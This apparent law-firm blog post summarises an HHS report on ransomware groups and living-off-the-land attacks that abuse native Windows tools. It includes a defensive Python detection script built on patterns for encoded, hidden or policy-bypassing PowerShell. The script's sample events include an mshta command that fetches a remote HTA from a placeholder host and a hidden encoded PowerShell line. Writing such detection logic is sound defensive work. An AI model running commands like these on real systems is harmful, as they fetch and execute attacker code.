DISCERNING DATA

A Faegre Drinker Blog Covering the Latest in Privacy, Cybersecurity and Data Strategy
HHS Ransomware Report Details Revival of Dangerous LOTL Cyberattack

On May 5, 2022, the U.S. Department of Health and Human Services (HHS) issued a report entitled “Ransomware Trends in the HPH Sector” (HHS Report) that reviewed key cybersecurity threats and trends affecting the U.S. healthcare sector.

Key takeaways from the HHS Report include:

  • The five most active ransomware groups that are focusing on selling their Ransomware as a Service platform are Lockbit, Conti, SunCrypt, ALPHV/Blackcat and Hive.
  • Certain ransomware groups are taking a political stance in the Russia-Ukraine conflict, including the ransomware gang Conti, which has openly sided with the Russian government.
  • There has been a noticeable decrease in the time it takes for the malware launched by these gangs to infect a victim’s systems – specifically, ransomware attacks that previously took five days to fully infect a system now can take less than two days.

The HHS Report also discusses the troubling return to prominence of “Living off the Land” (LOTL) cyberattacks. LOTL attacks were first used with frequency in approximately 2013; in them, threat actors use system tools supplied by the host operating system – tools normally used for legitimate purposes – to help launch ransomware and other malicious cyberattacks. LOTL attacks are considered “fileless” and, because they use tools from the host operating system, they are much more likely than a traditional malware attack to go undetected before doing substantial damage.

LOTL attacks rely on techniques that are not typically written to a hard drive; instead they use tools that operate in “volatile memory.” Data written to a hard drive remains resident even after the computer or device is turned off, and it is still there once the device is turned back on. Volatile memory, however, holds data only while the device is powered on. Once the device is powered off, the data stored in volatile memory is generally lost and unrecoverable to the average user.

According to the HHS Report, malicious actors involved in perpetrating LOTL attacks are increasingly leveraging legitimate operating system tools during ransomware intrusions. The tools that are utilized include:

  • Remote Access Tools
  • Encryption Tools
  • File Transfer Tools
  • Microsoft Sysinternals Utilities
  • Open-Source Tools

Many of the tools noted below that are used in LOTL attacks are native to a Windows-based environment. These include:

  • CMD.exe
  • PowerShell
  • Task Scheduler
  • MSHTA
  • Sysinternals
  • Team Viewer
  • Kaseya
  • LogMeIn

LOTL attacks subvert these internal tools and use them nefariously while moving through the victim network. The attacks are difficult to detect because the tools themselves are not malignant per se; they were developed by the software designer to help users in the Windows environment. LOTL attacks are dangerous because the malicious actors who use them are finding ways to take these internal, seemingly benign processes and use them as part of their attack as they move around the victim system or network.

Threat actors benefit from LOTL attacks because the attacks are less likely to flag and alert endpoint detection tools. In addition, LOTL attacks provide better camouflage to threat actors, allowing them to blend in with normal administrative tasks while performing reconnaissance on the targeted systems.
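As an added illustration of the detection problem described above (not code from the HHS Report or from this post), the following Python triage routine scores constructed Windows process-creation events for unusual use of the native tools the post lists. The event fields, parent/child baseline, regular expressions and weights are my own assumptions, modelled loosely on the fields a Sysmon process-creation event carries.

```python
import re
from dataclasses import dataclass

# Native Windows tools named in the post; abuse hides behind their normal use.
LOTL_BINARIES = {"cmd.exe", "powershell.exe", "mshta.exe", "schtasks.exe"}
# Assumed baseline: these parents rarely launch the tools above on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
# Command-line traits worth a second look (assumed); none is malicious on its own.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), 3, "encoded PowerShell"),
    (re.compile(r"\bhidden\b", re.I), 2, "hidden window"),
    (re.compile(r"https?://", re.I), 2, "remote URL in command line"),
    (re.compile(r"\bschtasks\b.*/create\b", re.I), 2, "scheduled task creation"),
    (re.compile(r"\bbypass\b", re.I), 2, "execution policy bypass"),
]

@dataclass
class ProcEvent:
    parent: str   # parent image path or name
    image: str    # launched image path or name
    cmdline: str  # full command line as logged

def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return a risk score and the reasons behind it for one event."""
    image = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent.lower().rsplit("\\", 1)[-1]
    score, reasons = 0, []
    if image not in LOTL_BINARIES:
        return score, reasons
    if parent in OFFICE_PARENTS:   # a native tool launched from a document
        score += 4
        reasons.append(f"{image} spawned by Office process {parent}")
    for pattern, weight, label in SUSPICIOUS_ARGS:
        if pattern.search(ev.cmdline):
            score += weight
            reasons.append(label)
    return score, reasons

def triage(events, threshold=4):
    """Return (score, event, reasons) for events at or above the threshold, highest first."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append((score, ev, why))
    return sorted(hits, key=lambda h: -h[0])

# Constructed sample events; the first two mimic routine administration.
SAMPLE = [
    ProcEvent("explorer.exe", "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c dir"),
    ProcEvent("services.exe", "C:\\Windows\\System32\\schtasks.exe", "schtasks /query"),
    ProcEvent("WINWORD.EXE", "C:\\Windows\\System32\\mshta.exe", "mshta http://example.invalid/x.hta"),
    ProcEvent("cmd.exe", "powershell.exe", "powershell -w hidden -enc AAAA"),
]
```

Running `triage(SAMPLE)` surfaces only the last two events, which is the point: the same binaries appear in the benign events, so context (parent process, command-line traits) rather than the tool's name has to carry the detection.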

The return to prominence of LOTL attacks is a potentially dangerous threat that businesses should consider and plan for when working on their overall cyber hygiene and cybersecurity defenses.

The material contained in this communication is informational, general in nature and does not constitute legal advice. The material contained in this communication should not be relied upon or used without consulting a lawyer to consider your specific circumstances. This communication was published on the date specified and may not include any changes in the topics, laws, rules or regulations covered. Receipt of this communication does not establish an attorney-client relationship. In some jurisdictions, this communication may be considered attorney advertising.

About the Author: Jason G. Weiss

Jason G. Weiss leverages a past career as a cybersecurity and computer forensics Supervisory Special Agent with more than 22 years of decorated service at the FBI to guide clients through the complex and high-stakes issues associated with cybersecurity incident preparedness and response and compliance. View Jason's full bio on the Faegre Drinker website.

About the Author: Peter Baldwin

Peter Baldwin draws on his experience as a former federal prosecutor to counsel clients facing government investigations and cybersecurity issues. View Peter's full bio on the Faegre Drinker website.

About the Author: Grayson Harbour

Grayson Harbour is an associate in the firm's Labor & Employment practice group. Read Grayson's full bio on the Faegre Drinker website.

About the Author: Jane Blaney

Jane Blaney assists clients seeking solutions related to insurance matters, with concentrated knowledge in health insurance, health insurance regulation and technology services. View Jane's full bio on the Faegre Drinker website.

May 16, 2022
Written by: Jason G. Weiss, Peter Baldwin, Grayson Harbour and Jane Blaney
Category: Cybersecurity
Tags: cyberattack, HHS, RaaS
